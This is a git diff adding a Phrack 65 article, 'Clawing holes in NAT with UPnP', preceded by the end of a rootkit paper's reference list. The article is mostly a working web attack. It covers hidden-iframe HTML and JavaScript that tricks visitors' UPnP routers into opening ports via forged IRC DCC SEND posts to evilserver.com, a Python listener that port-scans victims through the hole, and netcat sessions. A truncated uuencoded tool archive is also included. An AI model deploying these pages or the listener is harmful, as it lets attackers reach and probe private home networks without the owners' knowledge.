+[9] Joanna Rutkowska and Alexander Tereshkin, Blue Pill project
+http://bluepillproject.org/
+
+[10] Frank Boldewin, A Journey to the Center of the Rustock.B Rootkit
+http://www.reconstructer.org/papers/
+A%20Journey%20to%20the%20Center%20of%20the%20Rustock.B%20Rootkit.zip
+
+[11] Frank Boldewin, Peacomm.C - Cracking the nutshell
+http://www.reconstructer.org/papers/
+Peacomm.C%20-%20Cracking%20the%20nutshell.zip
+
+[12] Stealth MBR rootkit
+http://www2.gmer.net/mbr/
+
+[13] EP_X0FF and MP_ART, Unreal.A, bypassing modern Antirootkits
+http://www.rootkit.com/newsread.php?newsid=647
+
+[14] AK922 : Bypassing Disk Low Level Scanning to Hide File
+http://rootkit.com/newsread.php?newsid=783
+
+[15] CardMagic and wowocock, DarkSpy
+http://www.fyyre.net/~cardmagic/index_en.html
+
+[16] pjf, IceSword
+http://pjf.blogone.net
+
+[17] Gmer
+http://www.gmer.net/index.php
+
+[18] Pageguard papers (Uniformed) :
+
+- Bypassing PatchGuard on Windows x64 by skape & Skywing
+  http://www.uninformed.org/?v=all&a=14&t=sumry
+  
+- Subverting PatchGuard Version 2 by Skywing
+  http://www.uninformed.org/?v=all&a=28&t=sumry
+  
+- PatchGuard Reloaded: A Brief Analysis of PatchGuard Version 3 by Skywing
+  http://www.uninformed.org/?v=all&a=38&t=sumry
+
+[19] Greg Hoglund, Kernel Object Hooking Rootkits (KOH Rootkits)
+http://www.rootkit.com/newsread.php?newsid=501
+    
+[20] Windows Heap Overflows - David Litchfield 
+http://www.blackhat.com/presentations/win-usa-04/bh-win-04-litchfield/
+bh-win-04-litchfield.ppt
+
+[21] Bypassing Klister 0.4 With No Hooks or Running a Controlled 
+     Thread Scheduler by 90210 - 29A
+http://vx.netlux.org/29a/magazines/29a-8.rar
+
+[22] Microsoft, Debugging Tools for Windows
+http://www.microsoft.com/whdc/devtools/debugging/default.mspx
+
+[23] Kad, Phrack 59, Handling Interrupt Descriptor Table for fun and profit
+http://phrack.org/issues.html?issue=59&id=4#article
+
+[24] Wikipedia, Southbridge
+http://en.wikipedia.org/wiki/Southbridge_(computing)
+
+[25] Wikipedia, Northbridge
+http://en.wikipedia.org/wiki/Northbridge_%28computing%29
+
+[26] The NT Insider, Stop Interrupting Me -- Of PICs and APICs  
+http://www.osronline.com/article.cfm?article=211 (login required)
+
+[27] Russinovich, Solomon, Microsoft Windows Internals, Fourth Edition
+Chapter 3. System Mechanisms -> Trap Dispatching
+
+[28] MSDN, KeyboardClassServiceCallback
+http://msdn2.microsoft.com/en-us/library/ms793303.aspx
+
+[29] Clandestiny, Klog
+http://www.rootkit.com/vault/Clandestiny/Klog%201.0.zip
+
+[30] Alexander Tereshkin, Rootkits: Attacking Personal Firewalls
+www.blackhat.com/presentations/bh-usa-06/BH-US-06-Tereshkin.pdf 
+
+[31] MSDN, NdisMIndicateReceivePacket
+http://msdn2.microsoft.com/en-us/library/aa448038.aspx
+
+[32] Subverting VistaTM Kernel For Fun And Profit by Joanna Rutkowska
+http://invisiblethings.org/papers/
+joanna%20rutkowska%20-%20subverting%20vista%20kernel.ppt
+
+[33] Vista RC2 vs. pagefile attack by Joanna Rutkowska
+http://theinvisiblethings.blogspot.com/2006/10/
+vista-rc2-vs-pagefile-attack-and-some.html
+
+[34] Russinovich, Solomon, Microsoft Windows Internals, Fourth Edition
+Chapter 7. Memory Management -> System Memory Pools
+
+[35] KeUserModCallback ref - "Ring0 under WinNT/2k/XP" by Ratter - 29A
+http://www.illmob.org/files/text/29a7/Articles/29A-7.003 
+
+[36] Joanna Rutkowska - Towards Verifiable Operating Systems
+http://theinvisiblethings.blogspot.com/2007/01/
+towards-verifiable-operating-systems.htm
diff --git a/phrack65/5.txt b/phrack65/5.txt
new file mode 100644
index 0000000..ec45ba9
--- /dev/null
+++ b/phrack65/5.txt
@@ -0,0 +1,1013 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0c, Issue 0x41, Phile #0x05 of 0x0f
+
+|=-----------------=[ Clawing holes in NAT with UPnP ]=------------------=|
+|=-----------------------------------------------------------------------=|
+|=---=[ max_packetz@felinemenace.org <http://www.felinemenace.org> ]=----=|
+|=--------------------------=[ April 12th 2008 ]-=-----------------------=|
+
+--[ Contents
+
+  1 - Introduction / An overview of NAT and UPnP.
+
+  2 - Implementation Details
+   2.1 - Implementation specifics: IRC Protocol: DCC 
+   2.2 - Implementation specifics: Java
+   2.3 - Implementation specifics: HTML
+   2.4 - Implementation specifics: Listener
+
+  3 - Putting it all together with Python
+
+  4 - References
+
+  5 - Appendix A: Source code
+
+
+--[ 1 - Introduction / An overview of NAT and UPnP.
+
+Welcome reader, this paper is a short attempt at documenting a 
+practical technique we have been working on. Although our technique 
+uses very similar technology to many other attacks, we have not 
+seen this documented in such a manner before, nor have we seen a 
+practical implementation in the wild. This paper is therefore designed 
+to accommodate this.
+
+Our technique allows the attacker (us) to craft a website which, 
+when visited, will cause the victim to inadvertently forward any port 
+of our choice through their NAT, allowing us to connect directly to them 
+inside their private network via UPnP.
+
+Before we launch into the specifics of the technique, or our 
+implementation details, you must first be familiar with a couple of 
+fairly straight forward concepts. These are: "Network Address 
+Translation" (NAT) and "Universal Plug and Play" (UPnP).
+
+Hopefully most people reading this paper are already familiar with 
+NAT. For those who arn't, NAT basically allows several machines 
+to share a single IP address without conflict. This means that a single 
+computer or router acts as a gateway for several other computers. To 
+learn more about the specifics of NAT read the RFC in the references 
+section [1].
+
+For a typical home user, NAT is implemented by their DSL modem/router
+and is fairly seamless. The internal IP address is assigned by a DHCP
+service on the router and internal users are almost never aware of 
+their external address.
+
+It is a common misconception that NAT provides an impenetrable
+security layer for the internal hosts. Often this leads to a 
+more lapse security policy for internal machines, and a nice 
+gaping hole for anyone who manages to penetrate the outer shell.  
+It is very common to find publicly accessible smb shares or poorly 
+patched services etc. using our technique.
+
+The other concept which you must be familiar with before we 
+can get into the (hopefully) interesting section of this paper
+is "Universal Plug and Play ", UPnP. 
+
+Universal Plug and Play (UPnP) is a set of protocols which were 
+consolidated by the UPnP forum. The general theme which all these 
+protocols have in common is that they allow for seamless implementation 
+of networks and data communication.
+
+The major feature of this protocol suite which is of interest to us in 
+the context of this paper is the NAT punching functionality.
+
+This feature describes how a gateway can parse various protocols 
+passing through it in order to forward ports through the NAT to the 
+internal service. It is designed in order to allow any host behind the 
+NAT to request that a port be opened up in the outer layer, and any 
+traffic received on this port will be forwarded through to the internal
+machine, creating new channel for communications.  This functionality
+allows protocols such as FTP/SIP/etc to function.  In these cases the 
+gateway responsible for NAT will parse the protocol stream looking for 
+requests for a separate channel to be created. It will then search and
+replace the IP and port values as they pass over the wire, replacing 
+them with the external values.  Thus, the other end of the transaction
+knows to try to connect to the external IP address and port, rather 
+than the internal values.
+
+It is very common currently for most household ADSL/modems and routers 
+to ship with UPnP enabled by default. Also the Linux kernel supports 
+UPnP with ipfilter, however this isn't a default config option and
+only really active when using a Linux box as a gateway device.
+
+It's this feature that we are able to exploit in order to create the 
+forwarding of our choice, allowing us access any specific port on a 
+host behind the NAT directly, regardless of the fact the NAT is there.
+
+--[ 2 - Implementation Specifics
+
+In this chapter we will try to provide a detailed overview of our 
+technique itself and discuss our implementation details. We will 
+try to explain the criteria for selecting each of the protocols and 
+technologies we used for implementing each component of our technique.
+
+For those of you familiar with the technologies associated with our 
+implementation, the overview below should be enough for you to implement 
+our technique by yourself.  However we would like to note that our 
+technique can be implemented in other ways, and our implementation 
+serves as just one example. We will only discuss the various technologies 
+used by felinemenace throughout the rest of this paper.
+
+The basic premis of our technique is to encapsulate one protocol 
+(specifically one of the protocols which are handled by UPnP NAT 
+Punching functionality) within a second, transport protocol. This way 
+when the gateway see's the traffic it will interpret the encapsulated 
+protocol string as a request to open a port, and act accordingly.
+
+Our implementation begins by convincing the victim to visit a website 
+of our choice. This can be accomplished via social engineering, cross 
+site scripting, phishing, baiting, banner ads, etc. Once the victim 
+has accessed our site, we have enough control over their browser in 
+order to redirect it to any port of our choice, on any address. This 
+flexibility allows us to accomodate almost any choice of protocol to 
+be encapsulated within the web session. The aformentioned behaviour 
+makes (in the author's opinion) the use of HTML/Javascript, as a 
+delivery mechanism, to be a very effective choice. 
+
+When the victim accesses the website a fake (bait) web site is displayed 
+to them. This is done so as not to encourage the user to immediately close
+the page upon load.
+
+From this stage the attacker uses one of the various methods of 
+browser redirection, HTTP response, javascript redirection etc. in
+order to redirect the victim's browser to a port of the attacker's 
+choice. We chose JavaScript since a large portion of the technique was
+already written in JavaScript. This is documented in the HTML section
+of the paper.
+
+The attacker chooses a port which corresponds to a particular protocol
+that performs a data transfer out of band with the initial communication. 
+In our case we chose the DCC feature from the IRC protocol. [3] Our reason
+for choosing this protocol was simply because we were already familiar 
+with it however, any protocol which fits this criteria is fine. The 
+attacker then (using the JavaScript running on the victims computer at 
+this stage) forces the victim to send text from the appropriate 
+protocol, (DCC in our case) back to the attacker. If the gateway 
+device responsible for NAT has UPnP features enabled, this will cause 
+the device to open up a hole (as mentioned previously) and grant the 
+attacker direct access to the local machine behind the NAT.
+
+By redirecting multiple times, an attacker is able to open up a range
+of ports, to portscan the host, or connect to any service running
+on the local machine.
+
+We have provided an implementation of this for you to use, however 
+obviously writing your own will make it less detectable / more useful.
+
+Now that we've looked at the technique from a high level breakdown we 
+will dive deeper into each of the technologies which come together to 
+make our technique work.
+
+To summarize this section, the following technologies will be covered
+by this paper:
+
+o IRC Protocol: DCC
+o A Java Applet.
+o HTML with JavaScript.
+o Python code to ./scriptkiddify the whole process up.
+
+The rest of this chapter has been broken down into a walkthru of the 
+in's and out's of each of the technologies mentioned, and how we can 
+manipulate them to our desired end.
+
+Each of the following sections will describe a single technology, and how
+we used it.
+
+--[ 2.1 - Implementation specifics: IRC Protocol: DCC
+
+The first step in our implementation is to find a protocol which requires
+a separate socket connection in order to communicate directly with 
+an end user. 
+
+While, as mentioned previously, there exist a multitude of protocols 
+which fit our criteria, for the sake of this paper we will demonstrate
+one in particular, RFC-1459 [3] Internet Relay Chat.
+
+While i'm sure that most people reading this paper are already 
+intimately familiar with IRC, i will give a brief rundown on the aspects 
+of the protocol which are interesting in the scope of this paper.
+
+Basically IRC requires that each client connects to a central server,
+typically on port 6667. When one client wishes to send a message to another
+they send a message to the server using the existing socket connection they
+have open. The server then forwards this message on to the target client.
+
+If two of the users on an IRC server wish to communicate without having the
+server be responsible for passing the message between them, (read; trade
+top secret 0day juarez) they can establish a separate communication 
+channel. This is accomplished by using a subset of the IRC protocol known 
+as DCC (Direct Client to Client).
+
+DCC works by one client sending a request to establish an out of band
+connection with another client on the IRC server. This request contains 
+both the IP and port on which the communication will take place. The 
+second client then simply establishes a TCP connection with these 
+details, and uses it for further communication. 
+
+What this basically boils down to is the following line.
+
+"\x01DCC SEND fake.exe 2130706433 1337\x01\r\n\r\n"
+
+This is the format of a DCC SEND command. As you can see the entire 
+command is enclosed within "\x01" characters. It contains the words
+"DCC SEND" followed by the name of the file which is going to be sent.
+After this is the internal IP address of the requesting host, in numeric
+decimal format, and finally the port the transaction will take place on.
+The format of the IP address is explained more thoroughly by optiklenz in 
+Keen Veracity 6 [5].
+
+This aspect of the protocol clearly will not work under a typical NAT 
+environment (without UPnP enabled).  After receiving the IP address and 
+port information, the connecting host would end up trying to connect to a 
+local address (the address of the machine inside the NAT), and
+never actually make it back to the intended recipient. It is for this 
+reason that a UPnP enabled gateway must parse IRC traffic looking for 
+DCC style commands. When this is detected, the gateway will replace 
+the IP address in the request, with it's own address. When the 
+connection is received on the port specified, the gateway will forward 
+it inside the NAT to the originating host. It is this behaviour that, 
+as the attacker, we can exploit for our own benefit.
+
+If, as the attacker, we force the victim to send a crafted DCC SEND request
+(such as the one above) to port 6667 there's a good chance that the 
+gateway will open up the port specified in the request, providing UPnP is 
+enabled. The cool thing about this protocol is that no IP address is 
+specified for the connecting IP. This means that once the request has 
+taken place, a connection from anywhere in the world is completely valid. 
+
+Several implementations of UPnP do not even care if the IP address 
+specified in the DCC SEND command is the same as that of the victim 
+machine. In this case, the steps described so far are sufficient to open a 
+gaping hole in the gateway and connect to the victim. However in most 
+cases we need to first establish the internal IP address of the victim's 
+machine.
+
+Luckily there is an easy way to accomplish this from the web, which we 
+will address in the next section.
+
+--[ 2.2 - Implementation specifics - Java
+
+The easiest way to identify the local IP of the victim from the web is
+to use a Java applet. Applets are able to create a new Socket object and 
+call the "getLocalAddress()" method on it to obtain the local address of 
+the host (obviously).
+
+The following Java code illustrates this: 
+
+String s = (new Socket(s2, i)).getLocalAddress().getHostAddress();
+
+Luckily for us, there already exists a nicely pre-packaged Java applet 
+called MyAddress [4] which does this and can be downloaded straight from 
+their website.  
+
+The applet supports a variety of ways to access the local
+IP once it is obtained. One way is to specify the "mayscript" parameter
+in the applet tag; this causes a javascript function (MyAddress() by 
+default) to be called once the IP is obtained.  This is useful, as we can 
+effectively block until we receive this neccessary data.
+
+The following HTML demonstrates the use of this applet and the MyAddress()
+callback function.  Also (as mentioned earlier in the DCC protocol section)
+as the local IP address must be entered in "defunct" format, we've 
+provided the defunct() function to translate from decimal format to 
+defunct:
+
+	<applet code="MyAddress.class" name="myaddress" 
+	 mayscript width="0" height="0"></applet>
+	<script>
+	<!--
+		var ip = null;
+		function MyAddress(i) {ip = defunct(i); doevil();}
+		function defunct(sip) {
+			if(sip == null) return 0;
+			sip += '';  // ;( make sure it's a string
+
+			var dip = 0;
+			var a = sip.split(".");
+			var l = a.length;
+			for(var i=0; i<l; i++) 
+				dip += a[l-i-1]*Math.pow(256,i);
+			return dip;
+		}
+	-->
+	</script>
+
+--[ 2.3 - Implementation specifics: HTML
+
+Now that we can create a proper DCC send string, the next problem 
+to overcome is how to force the client to unknowingly send the 
+encapsulated string to a malicious server, thereby tricking their
+gateway into forwarding a port we specify.  HTML forms submitted 
+automatically via javascript are highly useful for this.
+
+Since the DCC string (and many other protocols you might choose
+to use with this technique) require multiple lines of communication
+to trigger the UPnP NAT traversal features, we set the "enctype" 
+attribute to "multipart/form-data".  This allows the required 
+carriage return and new line characters to be submitted via a 
+form field.
+
+The following form tag shows how to specify the enctype:
+
+	<form 	
+		id="evilform" 
+		name="evilform" 
+		action="http://evilserver.com:6667/"
+		method="post" 
+		enctype="multipart/form-data"
+	>
+
+In order to automate the submission of our DCC string (payload), 
+we use javascript to submit the form (after the internal IP address
+is obtained) via the form submit() method as follows:
+
+	function doevil(ip, port) {
+		var frm = document.forms['evilform'];
+		if(frm == null) return;
+		frm.payload.value = unescape("%01")
+			+ "DCC SEND evil.txt " + ip + " " + port + 
+			+ unescape("%01%0a%0d");
+		try { frm.submit(); } catch(err) { return; }
+	}
+	
+As you can see we've used javascript to craft the payload string,
+because of the neccessary (depending of gateway implementation) 
+carriage return and newline characters.
+
+The following HTML code demonstrates the code so far, including
+the use of the MyAddress applet mentioned in the previous section:
+
+	<html>
+	<head>
+	<title>(Untitled)</title>
+	<applet code="MyAddress.class" name="myaddress" 
+	        mayscript width="0" height="0"></applet>
+	<script>
+	<!--
+		var port = 1337;
+		function MyAddress(i) {ip = defunct(i); doevil(ip, port);}
+		function defunct(sip) {
+			if(sip == null) return 0;
+			sip += '';  // ;( make sure it's a string
+
+			var dip = 0;
+			var a = sip.split(".");
+			var l = a.length;
+			for(var i=0; i<l; i++) 
+				dip += a[l-i-1]*Math.pow(256,i);
+			return dip;
+		}
+		function doevil(ip, port) {
+			var frm = document.forms['evilform'];
+			if(frm == null) return;
+			frm.payload.value = unescape("%01")
+				+ "DCC SEND evil.txt " + ip + " " + port + 
+				+ unescape("%01%0a%0d");
+			try { frm.submit(); } catch(err) { return; }
+		}
+	-->
+	</script>
+	</head>
+	<body>
+	<form 	
+		id="evilform" 
+		name="evilform" 
+		action="http://evilserver.com:6667/"
+		method="post" 
+		enctype="multipart/form-data"
+	>
+	<input type="input" id="payload" 
+	 name="payload" value="null">
+	</form>
+	</body>
+	</html>
+
+By simply binding netcat to port 6667 of evilserver.com, this 
+code is enough to manually connect back to the port "port" once
+a victim has viewed this web page, as the following snippet 
+demonstrates:
+
+-[max@evilserver:~/simple]$ nc -lp 6667
+POST / HTTP/1.1
+Host: evilserver.com:6667
+User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.13) 
+Gecko/20080311 Firefox/2.0.0.13
+Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,
+text/plain;q=0.8,image/png,*/*;q=0.5
+Accept-Language: en-us,en;q=0.5
+Accept-Encoding: gzip,deflate
+Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+Keep-Alive: 300
+Connection: keep-alive
+Referer: http://evilserver.com/simpletest.html
+Content-Type: multipart/form-data; boundary=---------------------------
+162151946613101846322123277333
+Content-Length: 213
+
+-----------------------------162151946613101846322123277333
+Content-Disposition: form-data; name="payload"
+
+DCC SEND evil.txt 16909060 1337NaN
+-----------------------------162151946613101846322123277333--
+
+You can see that a victim has connected to our webpage (simpletest.html)
+and that the page has automatically submitted our DCC SEND send string.
+Using netcat again, we can connect back to the ip and port above (using 
+the defunct format works fine with nc):
+
+-[max@evilserver:~/simple]$ nc 16909060 1337
+muahahaha
+what are you doing here?!  
+
+Here's what it looks like from the victim's end:
+
+-[victim@QQ:~]$ nc -lp 1337
+muahahaha
+what are you doing here?!  
+
+Obviously there are some significant drawbacks to using this
+simplified example...who wants to sit and manually monitor 
+their connections and then manually connect back to victims?
+What if you want to connect to multiple ports?  Won't it kinda
+tip the victim off (or at least bore them mightily) if there's 
+nothing but a dodgy page for them to look at?  How about something
+interesting?  Like maybe an article....
+
+The topic of the listening and connect back mechanism is addressed
+in the next section of this chapter.  The content problem and the 
+ability to forward multiple ports per visit are addressed by creating
+an additional page (evil.html) that contains two HTML iframes, one hidden 
+and one visible.  While the victim is distracted by content in the 
+visible iframe (goodframe), the hidden iframe (evilframe) 
+loads the second page (evilform.html) in order to post (as many times 
+as desired) to evilserver.
+
+The code might look something like this (note that we keep the 
+MyAddress code in evil.html; there's no sense in loading it multiple
+times):
+
+evil.html:
+
+	<html>
+	<head>
+	<title>(Untitled)</title>
+	<applet code="MyAddress.class" name="myaddress" 
+	        mayscript width="0" height="0"></applet>
+	<script type="text/javascript">
+	<!--
+		var ports = [135,137,138,139,22,1337];
+		var port = null;
+		var ip = null;
+
+		function MyAddress(i) {ip = defunct(i); openports();}
+		function defunct(sip) {
+			if(sip == null) return 0;
+			sip += '';  // ;( make sure it's a string
+
+			var dip = 0;
+			var a = sip.split(".");
+			var l = a.length;
+			for(var i=0; i<l; i++) 
+				dip += a[l-i-1]*Math.pow(256,i);
+			return dip;
+		}
+		function openports() {
+			if(!ports || !ip) return;
+			for(port in ports) 
+				document.getElementById('evilframe').src = 'evilform.html'; 
+		}
+	-->
+	</script>
+	</head>
+	<body style="padding: 0px; border:none; margin:0px;">
+	<iframe name="evilframe" id="evilframe" src="" 
+	        width="0" height="0" frameborder="0"></iframe>
+	<iframe name="goodframe" id="goodframe" 
+	       src="http://google.com" width="100%" height="100%"
+	       frameborder="0">
+        </iframe>
+	</body>
+	</html>
+
+Upon load, evilform.html will access evil.html's (its parent's) variables
+"port" and "ip" to craft the payload DCC string and then post:
+
+evilform.html:
+
+	<html>
+	<head>
+	<title>(Untitled)</title>
+	</head>
+	<script>
+	<!--
+		function doevil(ip, port) {
+			var frm = document.forms['evilform'];
+			if(ip == null || port == null || frm == null) return;
+			frm.internal_ip.value = 'internal_ip:'+ip;
+			frm.internal_port.value = 'internal_port:'+port;
+			frm.payload.value = unescape("%01")
+				+ "DCC SEND evil.txt " + ip + " " + port + 
+				+ unescape("%01%0a%0d");;
+			window.parent.formposting();
+			try { frm.submit(); } catch(err) { return; }
+		}
+	-->
+	</script>
+	<body onload="doevil(window.parent.ip, window.parent.port)">
+	<form 	
+		id="evilform" 
+		name="evilform" 
+		action="http://evilserver.com:6667/"
+		method="post" 
+		enctype="multipart/form-data"
+	>
+	<input type="input" id="payload" name="payload" value="null">
+	<input type="input" id="internal_ip" name="internal_ip" value="null">
+	<input type="input" id="internal_port" name="internal_port" value="null">
+	</form>
+	</body>
+	</html>
+  
+Note that evilform.html is now also setting two additional form variables
+(with some tags to make them easier to regex out later) so that the 
+listener can note what the internal port and IP of the victim are.  Since 
+these variables aren't within a protocol string (like the DCC send string)
+the gateway will not replace them with the external values.
+
+Unfortunately, however,  the code above introduces a race condition: you
+can't be assured that evilform.html has had enough time to load and post 
+before it gets reloaded. We originally expected that this could be 
+remedied if the service listening on 6667 of evilserver.com replied with a 
+page that invoked a callback function in the parent page in the following
+manner:
+
+	<script>window.parent.imdone();</script>
+
+Unfortunately, modern browsers will limit access to data across iframes if 
+the source page's scheme, domain, or port is different.  Because our post
+is neccessarily to a different port (6667 vs 80), the above code will 
+always generate an exception.
+
+Our solution was to mitigate the issue by putting in enough delay after 
+evilform.html begins loading as to be reasonably assured that the page
+has completed it's automatic posting before reloading it. Since javascript
+has no sleep() function (that we could find), we used 
+window.setTimeout(fn, t):
+
+evil.html:
+	...
+		function MyAddress(i) {ip = defunct(i); opennextport();}
+	...
+		function formposting() {
+			window.setTimeout('opennextport()', 1000)
+		}
+		function opennextport() {
+			if(!ports || cp < 0 || cp > ports.length) return;
+			port = ports[cp++];
+			document.getElementById('evilframe').src = 'evilform.html'; 
+		}
+
+	...
+
+evilform.html:
+	...	
+		function doevil(ip, port) {
+			var frm = document.forms['evilform'];
+			if(ip == null || port == null || frm == null) return;
+			frm.internal_ip.value = 'internal_ip:'+ip;
+			frm.internal_port.value = 'internal_port:'+port;
+			frm.payload.value = unescape("%01")
+				+ "DCC SEND evil.txt " + ip + " " + port + 
+				+ unescape("%01%0a%0d");;
+			window.parent.formposting();
+			try { frm.submit(); } catch(err) { return; }
+		}
+	...
+
+One cosmetic issue remains with our code: the title of evil.html will not
+match that of our bait page.  If the bait page is hosted via the same 
+scheme on the same domain and port as evil.html, then this can be easily
+remedied with this code snippet:
+
+	function settitle() { document.title = 
+	window.frames['goodframe'].document.title; }
+	...
+	<body onload="settitle()">
+
+However, as previously mentioned, if the bait page is hosted on a 
+different server or using a different scheme, accessing goodframe's 
+document title would cause an exception to be raised.  In either case, 
+if the victim were to follow an internal link, the title would become 
+outdated.  Our solution was to wrap the assignment in a try / catch block
+and to set a timeout to call settitle again in 350 milliseconds:
+
+		function settitle() {
+			try{ document.title = window.frames['goodframe'].document.title;} 
+			catch(err) {return;}
+			window.setTimeout('settitle()', 350);
+		}
+
+
+Below is the final code:
+
+evil.html:
+
+	<!-- evil.html -->
+	<html>
+	<head>
+	<title>(Untitled)</title>
+	<applet code="MyAddress.class" name="myaddress" 
+	        mayscript width="0" height="0"></applet>
+	<script type="text/javascript">
+	<!--
+		var ip = null;
+		var port = null;
+		var ports = [135,137,138,139,22,1337];
+		var cp = 0;
+
+		function MyAddress(i) {ip = defunct(i); opennextport();}
+		function settitle() {
+			try{ document.title = window.frames['goodframe'].document.title;} 
+			catch(err) {return;}
+			window.setTimeout('settitle()', 350);
+		}
+		function defunct(sip) {
+			if(sip == null) return 0;
+			sip += '';  // ;( make sure it's a string
+
+			var dip = 0;
+			var a = sip.split(".");
+			var l = a.length;
+			for(var i=0; i<l; i++) 
+				dip += a[l-i-1]*Math.pow(256,i);
+			return dip;
+		}
+		function formposting() {
+			window.setTimeout('opennextport()', 1000)
+		}
+		function opennextport() {
+			if(!ports || cp < 0 || cp > ports.length) return;
+			port = ports[cp++];
+			document.getElementById('evilframe').src = 'evilform.html'; 
+		}
+	-->
+	</script>
+	</head>
+	<body onload="settitle()" style="padding: 0px; border:none; margin:0px;">
+	<iframe name="evilframe" id="evilframe" src="" 
+	        width="0" height="0" frameborder="0"></iframe>
+	<iframe name="goodframe" id="goodframe" src="http://google.com" 
+	        width="100%" height="100%" frameborder="0"></iframe>
+	</body>
+	</html>
+
+evilform.html:
+
+	<html>
+	<head>
+	<title>(Untitled)</title>
+	</head>
+	<script>
+	<!--
+		function doevil(ip, port) {
+			var frm = document.forms['evilform'];
+			if(ip == null || port == null || frm == null) return;
+			frm.internal_ip.value = 'internal_ip:'+ip;
+			frm.internal_port.value = 'internal_port:'+port;
+			frm.payload.value = unescape("%01")
+				+ "DCC SEND evil.txt " + ip + " " + port + 
+				+ unescape("%01%0a%0d");;
+			window.parent.formposting();
+			try { frm.submit(); } catch(err) { return; }
+		}
+	-->
+	</script>
+	<body onload="doevil(window.parent.ip, window.parent.port)">
+	<form 	
+		id="evilform" 
+		name="evilform" 
+		action="http://evilserver.com:6667/"
+		method="post" 
+		enctype="multipart/form-data"
+	>
+	<input type="input" id="internal_ip" name="internal_ip" value="null">
+	<input type="input" id="internal_port" name="internal_port" value="null">
+	<input type="input" id="payload" name="payload" value="null">
+	</form>
+	</body>
+	</html>
+
+Voila.  Now you have a couple of pages that can be used 
+to open ports for connecting to boxes that are NAT'd 
+behind UPnP enabled routers. The section below details the 
+final component of our implementation: the listener. 
+
+--[ 2.4 - Implementation specifics: Listener
+
+Possibly the most trivial component of our implementation is
+the listener. This service will sit on evilserver.com and 
+listen on the port of choice (6667 for IRC/DCC and our code
+above).
+
+When the victim browses to evil.html and inadvertantly posts
+via evilform.html, the listener is responsible for receiving 
+the connection. This can trivially be implemented in python 
+using the "SocketServer" module. A small example of this is 
+as follows:
+
+class RequestHandler(SocketServer.StreamRequestHandler):
+	def handle(self):
+		while(True):
+			try:
+				line = self.rfile.readline()
+			except:
+				return
+			...
+
+# begin listening for new connections.
+tcpserver = SocketServer.TCPServer(('localhost', port),RequestHandler)
+tcpserver.serve_forever()
+
+The implementation of the listener provided with this paper will also 
+attempt to connect back to the victim through their gateway, effectively 
+port scanning the victim, behind the NAT.
+
+Here is the code to do this:
+
+	def scan(self, ip, port):
+		sock = socket.socket()
+		sock.settimeout(1)
+
+		ret = sock.connect_ex((ip,int(port))) == 0
+		sock.close()
+		return ret
+
+The code for the listener (whiskers.py) can be generated with the script
+that is included in section Appendix A.
+
+The output of whiskers is as follows:
+
+-[max@evilserver:~]$ python whiskers.py
+
+***********************************************************
+Sat, 12 Apr 2008 01:13:17 GMT: Starting server....
+Sat, 12 Apr 2008 01:13:17 GMT: Server started: 1.2.3.1337 listening on 6667
+Sat, 12 Apr 2008 01:13:39 GMT: [+] Opened hole for port: 135 on ip: 1.2.3.4
+Sat, 12 Apr 2008 01:13:39 GMT: [+] ---- Internal port: 135 on ip: 
+                               192.168.0.100 - closed.
+Sat, 12 Apr 2008 01:13:40 GMT: [+] Opened hole for port: 137 on ip: 1.2.3.4
+Sat, 12 Apr 2008 01:13:40 GMT: [+] ---- Internal port: 137 on ip: 
+                               192.168.0.100 - closed.
+Sat, 12 Apr 2008 01:13:42 GMT: [+] Opened hole for port: 138 on ip: 1.2.3.4
+Sat, 12 Apr 2008 01:13:42 GMT: [+] ---- Internal port: 138 on ip: 
+                               192.168.0.100 - closed.
+Sat, 12 Apr 2008 01:13:43 GMT: [+] Opened hole for port: 139 on ip: 1.2.3.4
+Sat, 12 Apr 2008 01:13:44 GMT: [+] ---- Internal port: 139 on ip: 
+                               192.168.0.100 - closed.
+Sat, 12 Apr 2008 01:13:45 GMT: [+] Opened hole for port: 22 on ip: 1.2.3.4
+Sat, 12 Apr 2008 01:13:45 GMT: [+] ---- Internal port: 22 on ip: 
+                               192.168.0.100 - open.
+Sat, 12 Apr 2008 01:13:53 GMT: Server stopped.
+
+As you can see, the victim had a service running on port 22.
+
+--[ 3 - Putting it all together with Python.
+
+Since it's a bit cumbersome to remember which bit to swivel where and when 
+or what protocol's to use and how, we've provided an extensible python 
+script that generates the two webpages (with the options to name them 
+something a little more innocuous), MyAddress.class,  and a listener based 
+on specified parameters.  
+
+Type ./claw.py -h for usage.
+
+--[ 4 - References
+
+[1] Network Address Translation :: http://www.faqs.org/rfcs/rfc1631.html
+[2] UPnP NAT Traversal
+[3] Khaled would be proud       :: http://www.mirc.co.uk/help/rfc1459.txt
+[4] MyAddress Java Applet       
+                             :: http://reglos.de/myaddress/MyAddress.html
+[5] Defunct IP address representation
+http://www.mirrors.wiretapped.net/security/info/textfiles/keen-veracity/ ..
+  kv6.txt
+
+--[ 5 - Appendix A: Source code 
+
+The source code used in this paper was written by arachne.
+We really appreciate her work on this project.
+
+begin 644 claw.tgz
+M'XL(`,`+`$@``]1:_U?;QK+OK]9?L18AEH(M!`D),3B!``FT@%5P<I,2ZB/;
+M`NM&EO0D&?#M[?_^/C.[DB7CM'WWG9[SGD^(5J/9V=GYOB,-`_?>BF<__)T_
+M&[]7MBVO+[<J5]O>VMAX\?*'C0UY\_+%BQ_LC><O[,T?A/VW<J5^TS1S$R%^
+M<!-W.`Z][^+]V7.Y&;NX_C_YK=37IVFR/O##]7B6C:-0TW5=:Q_RQ9_$49*)
+M=);FPULOB^*L>.`%WG!^%PV_><7==)J/+K/$#V]/NIKVZ>CB\J1[+CI"MRW;
+MVM"UPZ/WE[C]3;^/;OS`T]OZ_=A/OWE)"J/4FT*?N`/UX&RV/QHE7II:P\!-
+M4_UW[?*X>]'K.CVBH-^-C]MQVVE'[4%;UTZ[YQ_R)V,OB'7M;/]S'^N_ZUZ>
+M]+X`_!QKO_OX`:/W;I!ZVIV7#*+4SV:`V)J7)/UHFF&,S5MI-@)`&WF#Z>UC
+M\"1=`ARYF?L8"A(W8IJZMYZ!61U=-]M:33_TTSAP9ZG(QIY\*OSP)DHF;N9'
+MH<"(GV#;]\*-X\`?\@-+B`,W%`-/W/G>O3<2]WXV9LS66*2X&8YUK<9,&SI?
+M1!3JIE;S;P16%W7(1L?Z-7!F$)-N<GMW95^+-:&WA8X+L(`>0WV9>/.FM!$H
